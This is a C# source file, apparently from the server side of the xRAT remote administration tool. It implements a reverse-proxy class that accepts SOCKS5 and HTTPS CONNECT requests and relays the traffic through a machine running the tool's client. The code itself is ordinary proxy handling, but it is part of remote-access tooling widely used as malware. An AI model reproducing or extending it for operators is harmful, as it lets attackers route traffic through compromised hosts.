using System; using System.IO; using System.Net.Sockets; using System.Text; using System.Windows.Forms; using xServer.Core.ReverseProxy.Packets; namespace xServer.Core.ReverseProxy { public class ReverseProxyClient { public enum ProxyType { Unknown, Socks5, HTTPS }; public const int SOCKS5_DEFAULT_PORT = 3218; public const byte SOCKS5_VERSION_NUMBER = 5; public const byte SOCKS5_RESERVED = 0x00; public const byte SOCKS5_AUTH_NUMBER_OF_AUTH_METHODS_SUPPORTED = 2; public const byte SOCKS5_AUTH_METHOD_NO_AUTHENTICATION_REQUIRED = 0x00; public const byte SOCKS5_AUTH_METHOD_GSSAPI = 0x01; public const byte SOCKS5_AUTH_METHOD_USERNAME_PASSWORD = 0x02; public const byte SOCKS5_AUTH_METHOD_IANA_ASSIGNED_RANGE_BEGIN = 0x03; public const byte SOCKS5_AUTH_METHOD_IANA_ASSIGNED_RANGE_END = 0x7f; public const byte SOCKS5_AUTH_METHOD_RESERVED_RANGE_BEGIN = 0x80; public const byte SOCKS5_AUTH_METHOD_RESERVED_RANGE_END = 0xfe; public const byte SOCKS5_AUTH_METHOD_REPLY_NO_ACCEPTABLE_METHODS = 0xff; public const byte SOCKS5_CMD_REPLY_SUCCEEDED = 0x00; public const byte SOCKS5_CMD_REPLY_GENERAL_SOCKS_SERVER_FAILURE = 0x01; public const byte SOCKS5_CMD_REPLY_CONNECTION_NOT_ALLOWED_BY_RULESET = 0x02; public const byte SOCKS5_CMD_REPLY_NETWORK_UNREACHABLE = 0x03; public const byte SOCKS5_CMD_REPLY_HOST_UNREACHABLE = 0x04; public const byte SOCKS5_CMD_REPLY_CONNECTION_REFUSED = 0x05; public const byte SOCKS5_CMD_REPLY_TTL_EXPIRED = 0x06; public const byte SOCKS5_CMD_REPLY_COMMAND_NOT_SUPPORTED = 0x07; public const byte SOCKS5_CMD_REPLY_ADDRESS_TYPE_NOT_SUPPORTED = 0x08; public const byte SOCKS5_ADDRTYPE_IPV4 = 0x01; public const byte SOCKS5_ADDRTYPE_DOMAIN_NAME = 0x03; public const byte SOCKS5_ADDRTYPE_IPV6 = 0x04; //Make it higher for more performance if really required... probably not //Making this number higher will aswell increase ram usage depending on the amount of connections (BUFFER_SIZE x Connections = ~Ram Usage) public const int BUFFER_SIZE = 8192; public Socket Handle { get; private set; } public Client Client { get; private set; } private bool _receivedConnResponse = false; //Is used for the handshake, Non-Blocking private MemoryStream _handshakeStream; public long PacketsReceived { get; private set; } public long PacketsSended { get; private set; } public long LengthReceived { get; private set; } public long LengthSended { get; private set; } private byte[] _buffer; public int ConnectionId { get { return Handle.Handle.ToInt32(); } } public string TargetServer { get; private set; } public ushort TargetPort { get; private set; } public bool IsConnected { get; private set; } private bool _isBindCommand; private bool _isUdpCommand; private bool _isConnectCommand; private bool _isIpType; private bool _isIPv6NameType; private bool _isDomainNameType; private bool _disconnectIsSend; public ProxyType Type { get; private set; } private ReverseProxyServer Server; public string HostName { get; private set; } public bool ProxySuccessful { get; private set; } public ReverseProxyClient(Client client, Socket socket, ReverseProxyServer server) { this.Handle = socket; this.Client = client; this._handshakeStream = new MemoryStream(); this._buffer = new byte[BUFFER_SIZE]; this.IsConnected = true; this.TargetServer = ""; this.Type = ProxyType.Unknown; this.Server = server; try { socket.BeginReceive(_buffer, 0, _buffer.Length, SocketFlags.None, socket_Receive, null); } catch { Disconnect(); } } private void socket_Receive(IAsyncResult ar) { try { int received = Handle.EndReceive(ar); if (received <= 0) { Disconnect(); return; } if (received > 5000 || _handshakeStream.Length + received > 5000) { //attack prevention of overflowing the HandshakeStream //It's really impossible for Socks or HTTPS proxies to use even 5000 for Initial Packets Disconnect(); return; } LengthReceived += received; _handshakeStream.Write(_buffer, 0, received); } catch { Disconnect(); return; } byte[] payload = _handshakeStream.ToArray(); switch (PacketsReceived) { case 0: { //initial Socks packet if (payload.Length >= 3) { string headerStr = Encoding.ASCII.GetString(payload); //check the proxy client if (payload[0] == SOCKS5_VERSION_NUMBER) { Type = ProxyType.Socks5; } else if (headerStr.StartsWith("CONNECT") && headerStr.Contains(":")) { Type = ProxyType.HTTPS; //Grab here the IP / PORT using (StreamReader sr = new StreamReader(new MemoryStream(payload))) { string line = sr.ReadLine(); if (line == null) break; //could have done it better with RegEx... oh well string[] split = line.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries); if (split.Length > 0) { try { string ipPort = split[1]; this.TargetServer = ipPort.Split(':')[0]; this.TargetPort = ushort.Parse(ipPort.Split(':')[1]); this._isConnectCommand = true; this._isDomainNameType = true; //Send Command to client and wait for response from CommandHandler new ReverseProxyConnect(ConnectionId, this.TargetServer, this.TargetPort).Execute(Client); Server.CallonConnectionEstablished(this); return; //Quit receiving and wait for client's response } catch { Disconnect(); } } } } else { break; } if (CheckProxyVersion(payload)) { SendSuccessToClient(); PacketsReceived++; _handshakeStream.SetLength(0); Server.CallonConnectionEstablished(this); } } break; } case 1: { //Socks command int MinPacketLen = 6; if (payload.Length >= MinPacketLen) { if (!CheckProxyVersion(payload)) return; this._isConnectCommand = payload[1] == 1; this._isBindCommand = payload[1] == 2; this._isUdpCommand = payload[1] == 3; this._isIpType = payload[3] == 1; this._isDomainNameType = payload[3] == 3; this._isIPv6NameType = payload[3] == 4; Array.Reverse(payload, payload.Length - 2, 2); this.TargetPort = BitConverter.ToUInt16(payload, payload.Length - 2); if (_isConnectCommand) { if (_isIpType) { this.TargetServer = payload[4] + "." + payload[5] + "." + payload[6] + "." + payload[7]; } else if (_isDomainNameType) { int domainLen = payload[4]; if (MinPacketLen + domainLen < payload.Length) { this.TargetServer = Encoding.ASCII.GetString(payload, 5, domainLen); } } if (this.TargetServer.Length > 0) { //Send Command to client and wait for response from CommandHandler new ReverseProxyConnect(ConnectionId, this.TargetServer, this.TargetPort).Execute(Client); } } else { SendFailToClient(); return; } Server.CallonUpdateConnection(this); //Quit receiving data and wait for Client's response return; } break; } } try { Handle.BeginReceive(_buffer, 0, _buffer.Length, SocketFlags.None, socket_Receive, null); } catch { Disconnect(); } } public void Disconnect() { if (!_disconnectIsSend) { _disconnectIsSend = true; //send to the Server we've been disconnected new ReverseProxyDisconnect(this.ConnectionId).Execute(Client); } try { Handle.Close(); } catch { } IsConnected = false; Server.CallonUpdateConnection(this); } /// /// xRAT -> ProxyClient /// /// public void SendToClient(byte[] payload) { lock (Handle) { try { LengthSended += payload.Length; Handle.Send(payload); } catch { Disconnect(); } } Server.CallonUpdateConnection(this); } private void SendFailToClient() { if (Type == ProxyType.HTTPS) Disconnect(); if (Type == ProxyType.Socks5) { SendToClient(new byte[] {SOCKS5_VERSION_NUMBER, SOCKS5_AUTH_METHOD_REPLY_NO_ACCEPTABLE_METHODS}); Disconnect(); } } private void SendSuccessToClient() { if (Type == ProxyType.Socks5) SendToClient(new byte[] {SOCKS5_VERSION_NUMBER, SOCKS5_CMD_REPLY_SUCCEEDED}); } private bool CheckProxyVersion(byte[] payload) { if (Type == ProxyType.HTTPS) return true; //unable to check header... there is no header if (payload.Length > 0 && payload[0] != SOCKS5_VERSION_NUMBER) { SendFailToClient(); Disconnect(); return false; } return true; } public void CommandResponse(ReverseProxyConnectResponse response) { //a small prevention for calling this method twice, not required... just incase if (!_receivedConnResponse) { _receivedConnResponse = true; if (response.IsConnected) { this.HostName = response.HostName; //tell the Proxy Client that we've established a connection if (Type == ProxyType.HTTPS) { SendToClient(Encoding.ASCII.GetBytes("HTTP/1.0 200 Connection established\r\n\r\n")); } else if (Type == ProxyType.Socks5) { //Thanks to for the Maths try { SendToClient(new byte[] { SOCKS5_VERSION_NUMBER, SOCKS5_CMD_REPLY_SUCCEEDED, SOCKS5_RESERVED, 1, //static: it's always 1 (byte) (response.LocalEndPoint%256), (byte) (Math.Floor((decimal) (response.LocalEndPoint%65536)/256)), (byte) (Math.Floor((decimal) (response.LocalEndPoint%16777216)/65536)), (byte) (Math.Floor((decimal) response.LocalEndPoint/16777216)), (byte) (Math.Floor((decimal) response.LocalPort/256)), (byte) (response.LocalPort%256) }); } catch { //just incase the math failed //it will still show it's succesful SendToClient(new byte[] { SOCKS5_VERSION_NUMBER, SOCKS5_CMD_REPLY_SUCCEEDED, SOCKS5_RESERVED, 1, //static: it's always 1 0, 0, 0, 0, //bind ip 0, 0 //bind port }); } } _handshakeStream.Close(); ProxySuccessful = true; try { //start receiving data from the proxy Handle.BeginReceive(_buffer, 0, _buffer.Length, SocketFlags.None, socket_ReceiveProxy, null); } catch { Disconnect(); } } else { if (Type == ProxyType.HTTPS) { Disconnect(); } else if (Type == ProxyType.Socks5) { //send a connection fail packet SendToClient(new byte[] { SOCKS5_VERSION_NUMBER, SOCKS5_CMD_REPLY_CONNECTION_REFUSED, SOCKS5_RESERVED, 1, //static: it's always 1 0, 0, 0, 0, //Bind Address 0, 0 //Bind Port }); } } Server.CallonUpdateConnection(this); } } private void socket_ReceiveProxy(IAsyncResult ar) { try { int received = Handle.EndReceive(ar); if (received <= 0) { Disconnect(); return; } LengthReceived += received; byte[] payload = new byte[received]; Array.Copy(_buffer, payload, received); new ReverseProxyData(this.ConnectionId, payload).Execute(Client); LengthSended += payload.Length; PacketsSended++; } catch { Disconnect(); return; } PacketsReceived++; Server.CallonUpdateConnection(this); try { Handle.BeginReceive(_buffer, 0, _buffer.Length, SocketFlags.None, socket_ReceiveProxy, null); } catch { } } } }